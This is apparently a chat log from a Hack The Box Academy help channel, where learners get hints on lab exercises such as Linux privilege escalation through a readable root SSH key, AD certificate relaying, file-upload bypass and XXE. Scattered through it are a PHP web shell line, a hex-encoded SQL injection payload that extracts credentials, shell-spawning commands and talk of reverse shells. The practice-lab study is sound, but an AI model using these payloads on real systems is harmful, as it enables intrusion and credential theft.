#modules

can anyone review my code for the aes crypter on introduction to windows evasion?

WINDOWS ATTACKS & DEFENSE - skills assessment
i did the attack but unable to find the event (now unable to login to bob)
anybody can gelp me this is from the cdsa

which machine are you trying to connect to , to look at the events?

https://academy.hackthebox.com/achievement/361921/31

https://academy.hackthebox.com/achievement/badge/cf614227-1652-11ef-b18d-bea50ffe6cb4

imagine doing modules for 26 weeks, what a nerd

https://academy.hackthebox.com/achievement/badge/69b33a20-165e-11ef-b18d-bea50ffe6cb4

im using bob

okay , but what computer are you trying to connect to in order to look at the event logs?

should I try this experiment or not??

im using 172.16.18.20 to look for it ( that was the only credentials)

ill give you a hint, go back to the PKI - ESC1 section and look at the second question

No

Generally DoS is something you want to avoid

In both a pentest and a bug bounty

The only time it's "acceptable" is if it's incidental as you're searching for other vulns. But DoS is something you report immediately

okay thanx

alright thanks actually i havent even done it i just decided to do the skills assessment first XD

Yeah, skipping to the skill assessment isn't smart

Or, at least, getting stuck then not going back through to whatever you skipped

"Why can't I move forward with this thing I skipped"

Bob is simply an account used to coerce DC2 to connect back to the kali host (which then gets relayed to the PKI machine to request a certificate)

so i need to access dc2 or pki to see the event?

you tell me

😉

I would suggest going back to that section that Jared hinted at

no clue im just buzy staring at PKI-ESC1 slideshow of windows

the events of requesting a certificate, and issuing a certificate, are logged by the CA

which is the certificate authority

I wonder where a CA would lie 🤔

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

right , just to clarify, the CA is a component of PKI .

Certify.exe will list info about the CA , including its DNS host name

the domain is eagle . Or eagle.local when its machines of the same domain talking to each other

the vulnerable CA DNS hostname is shown to be PKI.eagle.local

we can see, both PKI and PKI.eagle.local resolve to the same IP

I’m definitely having a hard time here…
How do I get root?
It won’t let me execute scripts.

Getting Started/Pentesting Basics/Privilege Escalation

sudo -l and sudo -h or man sudo to see what all you can do with sudo aside from just root

Since you're user2

Check and see if you can access files you otherwise shouldnt

After I get access to user2, if I type “sudo -l” it ask for a password.

Since you're meant to get to root, check and see if there's files you can access

Maybe in /root/

It won’t let me access /root directory.

Well maybe you can't cd

But maybe you can list items in it

How?

What command lists things

Specifically files and directories

Ugh… 😖
Gimme a sec.

Maybe it helps if you think of it as (l)ist (s)tuff

Ls /root ?

That may not show you all files

man ls to see what arguments ls takes

Who knows something about credit cards

Now my VMware is updating.
I’m checking google.

You can google "man <command>" and there's a website that will pop up that basically has all the commands that have man pages

Who knows anything about credit cards

We don't do carding

Like nobody

Read #rules carefully

Specifically point 4

Yeah but like in private

It’s legal

No

Carding is illegal

Period

Ok

Without any further context. I'm assuming you're asking about credit cards so you can swipe them

Which is the illegal activity known as carding

lol at the “credit card” guy.
Def sounds a lil sus…

illegal and unethical

Err on the side of caution when little info is given

The less info someone gives about why they want to know something, the more suspicious it seems

See: "I need to hack my own account back that got stolen :("

Take a look at the sub-section titled "SSH Keys"

I didn't check personally but are a and b the same, a being user2's and b being the root's?

If so definitely easier

I can’t do anything with that without further access already.

They're more referring to where they're stored

No.
You have to somehow gain root from user2.

do you mind checking the US servers for the AD modules? seems like a couple of people are running into problems with either "no logon servers available" or "connection reset by peer", the exact same commands worked on eu servers. I know of 3 caes so far

I'm referring to something vaguely specific

Not that user2 == root

Not sure what you mean…

well let me ask you this. What does it mean in linux when a file or directory has a period in front of it? for example:

Hidden, I believe.
Ls -a

If you want to list them neatly, add -l to it

ls -la is a very ubiquitous command, used so often that I believe some distros default configs have ll and la as aliases for common ls combinations

-l Also gives file details

I like that markdown adds serifs

So I’m back in.
How do I list the content of /root with ls?

You were on the right track with ls /root/

You just need to see more, maybe hidden, directories

I mean, I know what’s in there.
It’s the flag. (Flag.txt)

But I have to be root to read it.
I don’t know how I’m supposed to escalate privileges.

You're focused too hard on the end goal

There's more in there than flag.txt

Read the section on SSH keys

Ok. I see the hidden files also.

So now view the hidden directory

(Directories with ls -l are indicated with a d before the permissions

You should see something interesting in there

Oooh ok. I got a little movement.
Gimme a sec… 😪🙃

:3

Don't forget to change permissions once you copy it to your system

Soon as I figure out how to copy it to my system lol.
I’m thinking I can maybe figure out the rest now.
We shall see.

I mean

Cat it, ctrl-shift-c --> your system, open any text editor of your choice, ctrl-shift-v [if terminal based like vi/nano] or ctrl-v

Hmm still not quite working…

I ssh in with the id_rsa file.
Nothing special happened.

alrigh thanks

Are you ssh to root?

Wait, I think I’m figuring it out.
I don’t be understanding these instructions, my brain think different.
One sec.

You found it in root

So why not try and use it to ssh to root

Well… I’m getting permission denied when I try to copy my ssh key.
So, I can’t ssh as root yet.

Are you copying the ssh key from the actual server or from the example

The example is missing a lot of info for a valid key

You can't edit authorized keys

But take a close look at who owns one of the files

lol the actual one.
I created my key on my machine with ssh-keygen -f key

It made the two files.

What is the reply time of support team?

I have msg them 2 days ago

That's gonna be impossible in this case, since you can't edit authorized keys file

So look at other options

Not sure what you mean.
I made my own key. With the passphrase,

Yes but you can't add it to the root authorized keys file

So how am I supposed to get the flag?

So again: look closely at all the files in the directory

Something should stand out very obviously

they have the authorized_keys file locked down. Only the root user can read/write. Not even members of the root group can do anything with it. Similar to the flag.txt file inside of /root.

Take a close look at permissions

Only one is readable by everyone

In theory, if we could write OUR public key (one that we generate via ssh-keygen) into the root users authorized_keys file, then we could SSH using the corresponding private key

We left off at copying the id_rsa file to my machine.
I chmod that file.

Then try to ssh as root??

Permissions are interested in that they are an octal set represent 3 distinct permission types

Yes

bingo!

:)

Do I still add the port number or just the base ip?

Add port # in this case

Since its public ip: port in this case

Nothing about the situation has changed to open up port 22

the target of this section is a Docker, not a full VM.

Note: when presented with a public ip and port, your only scope is the ip and port

so it can't make outbound connections

That is the only assumption you can make regarding those targets

Is that everything you do will involve those 2 elements

It’s asking for a password.
I tried that earlier,

It shouldn't if you add the id_rsa flag

Also know as the identity flag

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
is this controversial or am imissing something ?

-i id_rsa

They don't contradict

The second part is explaining how machines write their own spns

if i have control over forexample target.hq.com can i edit it's SPN to attacker.hq.com ?

What am I doing wrong here?

You don't need to be root on your own machine to ssh to it

Check if the target is still live

You can restart and try it again

I know. We went through this. That just automatic on this custom kali from Udemy.
But why isn’t my ssh working?

Yeah don't use the udemy kali image

Use the official one

Running around as root is highly irresponsible

I feel deja vu

https://tenor.com/view/déjàvu-drift-anime-initial-d-car-gif-17211916

check the file hash of the id_rsa file on the target machine, and see if it matches the one on your attack host

I know I know, I’ll fix that.

But this HTB flag tho… 🤔

The id_rsa should work if you copied the whole thing

The
----Start
And
------End lines are important

@fathom pendant Also, in the example, he is using SPN to point to another machine that has a different SAMAccountName.

So my command is correct?

I’ll check the id.
I’ll show you what I’m copying and pasting. 🤷🏽‍♂️

This seems unrelated to htb academy

I know, but I am asking if anyone else knows something about that

I may have respawned the target with the old id file.
I’ll go again.

Well you're better off asking in other channels since this channel is related to hrb academy again

compare file hashes

ah soryr

The id_file will be the same on any target it spawns

Well idk what’s wrong.
I’ll show you.

I'd advise not copy/pasting it here

I was gonna screenshot

Do md5sum id_rsa

Even still

What is md5sum?

It'll get the md5 hash of the file

Marcie, you’re making it more complicated lol.
I won’t show the whole thing.
Ok look…

Idek how to do that.

@uneven oracle "The MD5 message-digest algorithm is a widely used hash function producing a 128-bit hash value. MD5 can be used as a checksum to verify data integrity against unintentional corruption."

This is being suggested to verify if you have the correct file data in what you're using

the hash is a files fingerprint

if the hashes don't match, then you files are different

your*

if two files have the same hash, they are comprised of the exact same bits

It's literally running the command md5sum <file>

Add this first line?
And the one at the end?

Or the the encrypted text?

jareds snippet shows the command

Yes

Those are important to private key files

for who cares he is using msds-additionaldnshostname to update the SPN

Brother. Stop trying to get help here. There's other places to ask

If you have the red team role, you can access #red-team

i am just saying the answer dude

/join is the command

It sounds like they were missing the start and end lines

Which is why it kicked back to password auth

ah

It's one of the common issues I've seen

I did last time.
Not sure what I’m doing wrong.

yea we can't have any extra characters at all . No extra spaces, or new-lines

@uneven oracle When you run the SSH command to log in, what's the error?

Does the md5sum match?

Ok, now how do I check that?

...

I did…

its in the screenshots i sent you

md5sum <filename>

As stated multiple times

user2@ng-594497-gettingstartedprivesc-5ozxe-5886644b4b-68wgk:/root/.ssh$ md5sum id_rsa
60a0d4c65e84aa896ed1ad822b644696  id_rsa

If you have an additional new line at the end, it changes it

Doesn’t seem to be extra lines.
Gonna try again.

if you have a new line at the end >

┌─[us-academy-3]─[10.10.15.51]─[htb-ac-667914@htb-onq6iyjxix]─[~]
└──╼ [★]$ md5sum id_rsa
2f1b338a396f42b7b92b106c04781718  id_rsa

I’ll try and check these.

(the new line at the end does not effect it being usable)

i checked

ah interesting

so it should either match A or B

the new line gets added if you copie the whole line after catting it, not just to the last -

as it treats the whitespace after a line end as \n

but yeah if it matches either of those sums, it should be fine and work

Ok, they don’t match.
Not sure why.
Gonna redo it.

does it match either mine or jared's

if it matches either of them it should be fine

just to be sure

you also said you made your own id_rsa key file

when you copy/pasted the new file, did you use a different name?

or is it in a different file location

Nope.

(sometimes it matters what text editor you use)

as they may encode it slightly different

gonna sign off for the night, keep at it dawg !

cheers

you're 🤏 this close

I copy from the target machine.
Go to my machine and touch id_rsa. 🤷🏽‍♂️

i mean touch isn't a text editor

it just creates the file or updates the file to have a last edited date as current date/time

I double clicked on the file created, then pasted.

¯_(ツ)_/¯

learning in-terminal text editors is useful

not required per-se

but useful

Will do. Lot to learn..,

vi/vim/nano are the most popular

nano is the easiest to learn

vi/vim has a bit of a learning curve to it (but they do have a tutorial)

Def gonna get into vim once I get situated.

ugh vim

i use vim most often

I thought you would

Only elitists use vim

even wrote PoC for grabbing my academy transcript in it ¯_(ツ)_/¯

i'm not an elitist lol

I tried and I cbf with vim after a while

I'm kidding

just preference, i prefer the convenience of vim functions

I was doing some web dev, so of course I use VScode.

VScode is nice for coding

but i don't wanna launch vscode every time i wanna write a random file ¯_(ツ)_/¯

and my code didn't require anything fancy/i was lazy

But as a newb in terminal, I of course default to nano.

@uneven oracle Fix your ssh issue homie

either way

did you get it fixed?

:)

Right. lol
Y’all distracting me.

my light guess is that it was missing a - at the end

instead of 5x - it was 4x

I’m thinking that. Idk.
Leave me alone a sec lol.

Start from the top

Copy the entire file contents

Check the permissions of the file

If they're too "open" you need to change the file permissions

SSH with it should work after that

go do the thing, messages can wait

they've got the permissions thing already

ssh very much yells at you if your id_rsa file is too open

You said something about editors making it different.
I’ll try vim.
How do I past it into vim?

ctrl-shift-v

then hit escape a couple times; and type :wq

Interesting…
Now the md5sum matches.

Moment of truth. 🙏
Let’s see..,

remember to run: chmod 600 id_rsa

6 and 700 work

as long as the last 2 octals aren't > 0

otherwise ssh gets big mad

we can also echo it into a file

#GANG

I’m in… 😎

lets gooooooooo!!!

nice job 🙂

imagine using echo to write to files

I have captured the flag.

congrats

You guys are great.

now do it again

@fathom pendant you’re awesome…

Sure I’ll be back soon. 😅

so now that you're root

you could change permissions on the authorized_keys file

exhaust all available resources before asking here tbh; struggle until you think to yourself "surely, it's not a skill issue?"

also... reading is hard sometimes

then ssh-keygen from your own machine, and write YOUR public key into root users authorized_keys file

then SSH in as root again . But using YOUR private key

🔥

I was trying hard. I was stuck.
But I hear you.
And I quite appreciate the help.

learning basic checksum stuff is also useful

Extra credit?
I’m exhausted…
I’ll try that tho.

as you saw

Not sure what you’re referring to.

md5sum is a form of checksum verification

it checks the sum of a given algorithm

Ah… yes… good stuff.
Idk how you know so much.

meaning that no matter how many times you run md5sum on a file, as long as you don't change it -- it will always give the same sum

the amount of things to learn in this field is endless .

a will always equal a unless you change it to b

I posted in the wrong channel, i'm stuck on SAML signature wrapping attack, can someone help ? https://academy.hackthebox.com/module/170/section/1676

yep , its also a method of how anti-virus detects if a file is malicious

and websites like virustotal

Interestingly, it works a little different when coding.
Two bags with the same items are still two DIFFERENT bags… (in memory)

they might still be two different bags, but they have the same contents

(In memory) meaning the “checksum” would be different.

if you

bag1 = 5
bag2 = 5
print(f"bag 1 has {bag1} and bag 2 has {bag2}") 

bag1 == bag2

another thing i was going to suggest was running this command:
cat id_rsa | tail -n 5 | xxd

you can name a file something completely different

and it will still give the same checksum

as it's contents are the same

and see the actual bytes that comprise the file (specifically the last 5 lines )

So you code too? lol

I can’t remember the reference of my statement.
Brains about fried for the night. 🤓🫠😵‍💫

a potato is a potato until you make it a tomato ¯_(ツ)_/¯

Tomtato

Ladies and gentlemen…
I bid thee farewell. 🧐🥱😴

later homie !

Module: Windows Privilege Escalation
Section: Print Operators

I want to compile the ExploitCapcom.cpp modifying a line so that it executes a reverse.exe binary that will open a shell on my computer, the thing is that the cl.exe is not on the computer.

Does anyone know how I can compile it?

You would need a C++ compiler or visual studio can build it

i think a compiled version is already on the target machine though

oh but you want it to reverse shell

My message was drown in the others, is anyone available to help on this T3 and is able to check if the module is working as intended ? I'm pretty sure I did the correct stuff since I've been following the course by heart and even got to check the solution (I'm a gold annual subscriber) and it was exactly the same as the course

Sure, the one on the machine gives you a cmd.exe, but I want to practice it if GUI, so that it gives me a reverse shell.

yep this is the way

in skill assessment ii for ad attacks, im not exactly sure why the attack for the last user works on only a specific set of hosts and didn't work on the tool thats run on the attack host

@fathom pendant
how can I know that this website is using XML or sql or JSON in their databases before injection attack?

https://medium.com/@V-Blaze/json-and-xml-in-sql-working-with-json-and-xml-data-49fdde19427c

@upper haven sorry for the ping, something feel off with the module you designed, I did everything as instructed and everytime I try to add an assertion before or after the first assertion, i get invalid SAML whatever I do : https://academy.hackthebox.com/module/170/section/1676

Maybe the last update broke something ?

If you mean the type of database, you can identify it from errors

how to detect XML

encoded as hex

Like this <@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities>

But If it is secured
then?

Try ‘ “ # )

Use burp

https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding

Did you really study hard ????

I have completed bypassing
but I just want to know that
before doing injection I want to detect that I have to use XPATH injection

yes

suppose if it is using json
and I am trying XPATH injection

Idk 🤷‍♀️ good is ur friend

Or wait for someone who can help you

you try things until they work

you do basic tests

even I don't know its real format ?

i.e. with sql statements you might do ' UNION SELECT @@version,2,3,4,5

In req u can See Format

well that's assuming the backend is visible

Use burp

either way

most of the modules regarding attacks will detail how to test them

yes but don't know how to detect them

well follow the module dude

i'm not some magic oracle, just read the module, follow along, take notes

I only know what I know from reading and paying attention to the modules

yeah thankx
its enough

could there be any issue if browser is not opening after clicking many times ?

Use 🦊 foxy proxy

In Firefox

okay

sudo apt-get update --fix-missing

sudo apt-get upgrade --fix-missing

Try this it will fix the burp

apt-get is deprecated

it's just apt

Yeah what is the problem!!!

apt-get has no colors

just saying it's apt now

apt = apt-get

no... it doesn't

apt and apt-get are different commands technically speaking

while they can perform similar functions: proper syntax for new systems uses just apt

It’s alias bro ……..

But without color

no..it's not

apt is newer and has more features than apt-get

it's not an alias

it's supposed to be more user-friendly

so.. it's better apt-get

Ur right…..

Bro I have used
sudo apt update -y && sudo apt full-upgrade -y && sudo apt autoremove -y && sudo apt autoclean -y

--fix-broken

okay

and --fix-missing

what distro is this

Work in all distro 😒

Without arc

i mean what distro is uniki using

Kali or parrot … same

i mean similarish

if it's parrot he may fuck up his burp

i have burp working just fine on parrot

¯_(ツ)_/¯

last time i did parrot-upgrade burp became unusable because it was expecting a more recent version of OpenJRE

Try sudo apt-get update --fix-missing

sudo apt-get upgrade --fix-missing

but the repo for parrot doesn't have the newer version of OpenJRE

it works fine for me so i'm happy ¯_(ツ)_/¯

also parrot-upgrade is just a wrapper for apt upgrade and apt update

yes it is

Do not use epssec files

i'm still salty that i had to install burp manually

at least my issue was forwarded to the parrot devs

so maybe if i try now it'll work

they tend to look at the issues

it could be they backported the version of burp to match the JRE or updated the JRE in repos to match

it's also not uncommon to need to add -t lory-backports on occasion

hello, i need a small hint in file upload skills assessment, i successfuly found almost everything (bypass the filters, upload directory, name of the file) i just don't know what is the name of the flag in order to read it. or maybe an xxe way to list the root directory in order to find the name of the flag

Im going back to kali lol. Parrot is always.something broken

--fix or -force

skill issue (never used parrot)

Thats what a mac user would say

did you just assume my OS

I shouldnt have done that

https://tenor.com/view/thats-offensive-rude-sarcasm-sassy-insulted-gif-15291606

where the mods at

hi

hi

Yea, can't seem to spawn any targets in the academy labs

its working for me now did switch vpn servers 3 times tho

Nothing for me. The targets spawn, I can ping em and scan em but unless I can get a web page up, XSS practice isn't going to be easy.

Hi!

I have a problem with the module "Introduction to Digital Forensics" with the activity of "Practical Digital Forensics Scenario".

I have problems to resolve the 2 questions, can someone give me a hint for both? thank you 🥲

Hi again mods ,
I'm now sure there is an issue with "ATTACKING AUTHENTICATION MECHANISMS" module.
With the signature wrapping attack, the vm that is spawned is weak to the previous weakness : Signature exclusion attack, and not the one trained.

I can reexploit it the same way but when I do, I get the flag from previous question, so this module is unsolvable at the moment.

Who should I contact to be sure of the issue and get this fixed ?

Hello, i was doing the Pivoting, Tunneling, and Port Forwarding module at the Meterpreter Tunneling & Port Forwarding part, in the thing we had to connect to a ubuntu host that had access to a windows host, and foward an RDP connection from the ubuntu host to our attack host , i did that using SSH port fowarding, it worked for 3 seconds the RDP connection and it closed, now i can't connect anymore using "proxychains xfreerdp /v:172.16.5.19:3389 /u:victor /p:pass@123" and if i do a nmap scan "proxychains nmap 172.16.5.19 -p 3389" it says port closed. My question is, does windows firewall or something closed the port? Or am i doing something wrong?

I am considering restarting the lab

It is best to post it in #1234357888114364508 .
Vautia has written the module. I am sure he will look at it and correct it if necessary.

nmap says port closed, i cant connect to it using RDP, i don't know why it is closed, but it is, i think that windows firewall thing

I had many issues before doing htb boxes that we had to use rdp

and for some reason the rdp port closed

I googled around and asked chatgpt they both lead me to the conclusion that yes, for some reason windows closes ports

Okay im going to complain

Restart the Lab and then try again

will do, now, i want to ask did anybody see something like this before?

It can certainly happen that a VM crashes, for whatever reason. You can fix this by restarting the Lab

hello guys! how many modules of new senior infrastructure pentester will be released(tier 3)? I see that a lot of AD modules came.
I want to know this so I can understand how much to buy)

Until the path has been published, nobody in the community knows which and how many modules are required for the new path.

When the web senioer penetration tester was released, the releasers showed how many modules were left until the end of the path. Information just for fun)

If it's unknown, that's fine. Thank you

Yes, but only when the path was published. A new path has not yet been published.

What is certain is that there will still be a DACL Attacks module.
The DACL Attacks I module refers to three modules. Only I and II are currently published. There will therefore be a third module

Yes, that is true I remember. Waiting so much new modules

We will see what time will bring.

in skill assessment ii for ad attacks, im not exactly sure why responder doesn’t capture the hash for the last user on the attack box, but inveigh does

maybe because some requests are targeted and some are broadcasted

wdym?

i assumed it was because the subnet mask on the hosts is different from the mask on the attack host, but im not sure

where are you running responder and where are you running inveigh?

responder on the attack host, and inveigh on ms01

i take it by attack host you mean the foothold provided

yeah

hi all,

for Web Attacks - Skill Assessment https://academy.hackthebox.com/module/134/section/1219, am i supposed to be able to log in using the htb-student user?

i have identified several ||.php|| endpoints using fuzzing.
got the ||token|| and ||uid|| for the users

since i do not know what the requests look like, i am unable to proceed with restting the password of any user.

i have tried to place the ||uid|| and ||token|| parameters in the request but i still get Missing Parameters

may i have a bit of a hint on how to proceed?

yeah so, LLMNR/NTB-NS poisoning works by poisoning the broadcast and capuring the request, while the one you captured on ms01 is a direct NTLMv2 request

if you're still confused, check the scheduled task on the DC once you got DA

I think this is the most appropriate place to ask but I am newly starting in the academy I am coming from TCM. I have enrolled on the CREST CPSA/CRT pathway, might seem a stupid question but has the path been designed to best follow it in a linear fashion or can you just chop it around? thanks

so the first captured hash is sent specifically to the attack host, and the second hash is sent specifically to ms01?

most of the paths are designed to be followed linearly

thanks I'll get cracking on 🙂

first one is a broadcast

Hi everyone, can I dm someone who finished AD enumeration & attack part 2, I'm stuck at Q7, I know how to transfer files, I know I suppose to use Pr*******er.exe, but when I ran it, nothing happened

well you don't just run that command, you supply additional arguments

you're saying if I run it like in Windows Privilege Escalation module, it will not work?

Why is htbacademy so focused on theory? While I bet 90% no one can remember 80% of the words in it

||https://github.com/itm4n/PrintSpoofer||

note taking helps

Anybody complete the IDS/IPS Evasion Hard Lab in the Network Enumeration with Nmap course? I can find the DNS port and notice it's using TCP, but am struggling to get the version information. I've tried random decoys, used Syn-Ack, but am still coming up empty

look up spoofing in the reading for evasion: it has to do with the source-port

also the answer isn't related to the DNS port on the target, rather a port revealed after you do some minor evasion

Preciso de uma ajuda

Alguém pv por favor

Ah crap, turns out I download wrong version of P******r, thanks

it happens but just figured i'd give the docs :D RTFM and all that

este server es solo ingles; lee los #rules

should have build it from source, shouldn't be too lazy

i downloaded the binary and it worked fine for me

¯_(ツ)_/¯

I used this source previously https://github.com/k4sth4/PrintSpoofer

well -i drops you into the current shell

and well if you're not in an interactive shell

which is why you need to adjust

you'd likely want to use a command to say create a user 😉

heck Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

or by running a ||reverse shell payload||

what are you having trouble with?

that's just a repeat of the question

the instructions are fairly clear and the section details how one might use the crontab to check things

check crontab
crontab points to a .sh file
check the .sh file for references to other things

I am new to this, so please no hate 😄 . I am having trouble with HTB academy exercises where I need to host a payload and access it through a target, such as RCE or currently XXE (same problem with RFI). When I check the console, there are no GET requests from the target server; it seems like it times out. However, when I open the payload in my browser, I can see it and download it without any issues, even request in cmd is correct. I am using pwnbox for this setup.

Any advice or insights on what might be causing this problem ? Thanks

I did take look at that and was confused by how they chose the destination port, which I'm guessing may come from the initial evasion you mentioned. Also, I'm confused that the destination port isn't DNS since the question seems to reference what I did in the Medium Lab, which was focused on DNS.

maybe in your payload u put the wrong ip thats why u not receiving any call back to your nc

I copy paste the ip into my browser and no problem, even output in my console with GET request was there 😓 I am pretty sure ip is correct

take it outside the context of the direct port

instead of using the direct port use -p- with nmap to reveal it

the question merely asks for the version of the running services

not DNS directly

So basically instead of using the standard DNS port 53, they changed to another port number? I was kind of thinking about that because I had identified some high numbered ports.

incorrect

they put that high numbered port behind a firewall

Right, but the question says, "Identify the version of service our client was talking about", which was DNS. That's where I'm confused 😬

no, it's not

During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?

I cant connect to the SQL server,

command I used:

ERROR 2002 (HY000): Can't connect to server on '10.129.194.253' (115)```

and communication for the provided software had to be modified

they aren't talking about DNS

otherwise they'd specifically state DNS

scan it to see if mysql is running

and try again

if you read the hint; it's a bit more explicit in what it's doing

└─$ sudo nmap 10.129.194.253 -sV -sC -p3306 --script mysql*

PORT     STATE    SERVICE VERSION
3306/tcp filtered mysql```

if you feel it can be clearer, feel free to make a suggestion in #1234357888114364508

sounds like it didn't spawn properly, respawn it

it helps to provide the module and section name btw

is this the footprinting or common services module?

I saw that too, but got thrown off by the language I pasted in my last message, which I thought was referencing the Medium Lab. Thank you for the direction and clarification, I definitely needed it.

generally treat the skill assessments as separate

https://academy.hackthebox.com/module/112/section/1238
CPTS -> Footprinting -> SQL

Well I tried that earlier today and also just spawned a new instance..

my other question would be, are you connected to the vpn

I will do that, I know in the scans I did I never saw mysql, but the hint makes a ton more sense with that information

but since you can scan it

Yes :-)

wasn't talking to you for that one

mysql has nothing to do with transferring and handling lots of data

it's just a database

if it spawned correctly you should see that it's open

not filtered or anything like that

i'd suggest changing vpn regions and trying again

if respawning the machine doesn't work

Will try to reste - btw, what do I need to do to be able to send screenshots? Follow this maybe? #welcome message

yes

it also allows you to send large code blocks

otherwise automod treats you as a spammer and deletes it

you use 3x ` to specify code blocks right?

yes

Will do, thank you again!

but i just am referring to large blocks of text in general

Nice, btw do you know if I can use academy account on app.htb.com?

To verify

they are separate accounts

you can make one with the same email and link them via the SSO portal https://account.hackthebox.com

yeah but the reverse shell you added has to be your own ip

your own tun0 ip in most cases

you know what i meant lol

yes but some people might not

so figured i'd further clarify

yeah true thank u

if it's a docker target (public_ip:port) then getting a reverse shell is not the way

as they have more strict firewall rules to prevent outbound connections, and also are not on the vpn network

yeah you got to escape the docker which i hate lol

eh escape is a strong word

you don't escape any containers in that module

if you have RCE it's moreso just running the commands relevant to the OS

yeah we know he just giving an example about dockers

waza to all. I am stuck on the File Upload module. I am very close to get the answer as I was able to load a web shell. In previous exercises this web shell worked perfectly fine giving the flag but this time when trying to get the answer i can only see the code of the web shell rather this being run as PHP. Any help is welcome thank you!!!!!

my example was limited to the context of academy

Everything is via SSO now.

on which section of the file upload attacks module are you stuck

Everyone has an account.

i swear i've seen people say they can't log into the app site with their SSO and had to make then link an account

but that could have been *fixed ™️

its the whitelist filters

I have create multiple iteration of the file extensions and have found which one can be uploaded. But when i go to the file I just see the PHP web shell code rather this being run.

If you are stuck with the null-byte extension move onto the next one

One way to prove that you can execute PHP code is with a simple echo

Yea my sso doesnt work but login with htb acc works lol

did you link the SSO?

Yea

¯_(ツ)_/¯

might be worth a chat with support then lol

Once i get annoyed with it yea. Till now i just login with the htb acc

i mean

That is the SSO…

it helps other users not just yourself

Htb account = SSO

also yeah

LMAO the green button for "Login with HTB Account" is a redirect to the SSO portal

Account.htb you mean

Ah whats this then? This dowsmt work for me

Continue with HTB account -->

that's the SSO

the login page is purely for if you only have a login for that

and don't bother with the others

¯_(ツ)_/¯

Ah i see. Yea this one dowsnt work for me.anymore. the SSO works then

Got me confused

yeah because once you have SSO you just click the magic button

Yea i though for some reason that the first page was sso

I got you, i think my question was not clear, this is not reverse shell. This is xxe exercise, where you need to access parameter entity from external source.

To my understanding my PHP web shell is OK and i know it works. I think my issue is that when I make combinations of extensiosn e.g. php./.jpeg after I can find only a .jpeg file when visit it doesn't run the PHP code. SHould I create also additional extensions with phtml or phtm?

which section is it?

a combination of extensions would be .php/.jpeg

For file upload attack module skill assessment, I tried to identify filters for file extension (there are 5), test out if the request actually checking the file content by adding random strings (which it does check), I have also evaluate the response and decoded the base64 that ties with the file type. Now I am stuck... Do I need to fuzz thtough the content type parameter?

not php./.jpeg

I have tried also the above you just indicate.

also you generally just chain them as .php.jpeg

no /

not php\x00.png?

it depends

it accepted as image preview when I fuzzed that extension

i believe you two are working on separate sections

Web attacks - xxe - Advanced File Disclosure

you're on the skill assessment, he's on the whitelist section

ah

I have the magic byts as png and add the basic webshell <?php system($_GET['cmd']); ?> after the magic byts as part of the file content, and it still got flagged as image only

any thoughts on why?

@primal needle are u doing the cdata method or the error based method for the xxe?

im guessing the error based one

Yeah, try to fuzz extensions you are on the right path with the .php/.jpeg example

Cdata method, for the error based i was not able to čo method, because I am curious why it is not able to access external resource.

alright ima do it rn and then we can compare what u did to what i did and see

I really appreciate it, thanks

I have placed the <?php system($_GET['cmd']); ?> script lower in the file content, and it took it

but when I tried to visit the image http://IP/contact/upload_message/images.php/x00.png, it shows not found

@primal needle i have done it and it worked out for me for the error based xxe

can you pm me and send a ss of what u have done

I found it hahahahhaha. I just extended my list with additional php extensions and i got the one

thank you all for the help

Great job 👏

<@&861185840277487616>

not trusting a random google form

I was readint iiit

i'd suggest 1: speaking with an admin/sr mod and 2: reading the #rules :)

skill issue

tl;dr allegedly they are a researcher for uni and trying to get info about RCA (Root Cause Analysis) and trying to improve their educational institution

Ah oke ty

reading fast is a skill

i've read the .5 seconds of text on some PXE boot environments like those on PoS systems

I came from general and just saw the first few words before it got yeeted

Does anyone know why all of a sudden the module instances, the keyboard language is changed to another language? xd

? they've always been localed to at least English-UK

Accidently pressed Windows key+ space?

if they're using the pwnbox that generally wouldn't be the issue

That was xd

Thank you 🙂

This apparently solved the issue. Do you know how to exit this mf.. SQL prompt without ctrl c

;

Semicolon

Thanks!

Also it helps to learn "where" statements

I.e. select * from [table] where [column] = "[value]"

It's useful when you know a specific value in a column you want the rest of the data for

Thx! Yup, already took notes on that

working in footprinting mysql module. They ask in the last question the find the customer Ottos email, I found the email and submitted but its telling me the answer is wrong. Am I not using the correct email for the user or is it site problem?

no the answer is the email as it is

just check maybe you had an extra spaces or something

thanks for the response, checked spacing and still wont accept it. lol I been tryna fig this out all day going crazy so happy to atleast find out Im at right location @limber river

you can dm me the answer , so I can confirm it's correct or not

Try to copy-paste the answer instead of typing it

"AD Enumeration & Attacks - Skills Assessment Part II" Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host
Did anyone have trouble with uploading files to the SQL01 host? tryign to Priv esc on it and tryign to upload files, but seems like an issue. certutil, IWR, mounting share, etc failing. thanks for any help in advance

hi guys

I'm trying to follow along with some of the examples in the shells module

specifically spawning interactive shells using different interpreters

more specifically:
perl —e 'exec "/bin/sh";'

I have perl on my local system

but I cannot seem to get this to work from my interactive shell

Wdym "can't get it to work"

Try changing /bin/sh to /bin/bash

/bin/sh exists

yeah so specifically i get the error:
Can't open perl script "—e": No such file or directory

Ah

You're using a weird dash

That looks like an em dash

i can get the following to work:
#!/usr/bin/ruby
exec "/bin/sh"

placed in a file and run as a ruby script

Instead of the standard -

Like I said

It's your -

- – — are all different

One is the standard, the second is en the third is em

oops

good spot

I copied and pasted directly from the webpage

sometimes copying does some weird stuff ¯_(ツ)_/¯

yepp!

I doubt the webpage uses anything but the regular dash if you compare

https://academy.hackthebox.com/module/143/section/1509

does it normally take long for the psexec command to go thru

the goal:

ive used PSexec

and restarted the ip as well

but its just sitting on

psexec is what i used, not sure what you are trying to do in your 2nd screenshot

seems extra

that is what im doing lol

ah, better context

i was trying to keep the info out of it

you tried it without the -target-ip?

so psexec.py FREIGHTLOGISTICS.LOCAL/sapsso@academy-ea-dc03.inlanefreight.local

Is that the right ip for dc03? Second I think all the machines are in the /etc/hosts file so you might be able to specify the machine name

Yeah so instead of using IP use the machine name

Full caps ofc

It could also be that it's being dumb

Have you tried hitting enter?

<@&861185840277487616>

<@&861185840277487616>

<@&861185840277487616> in front of my nuggies

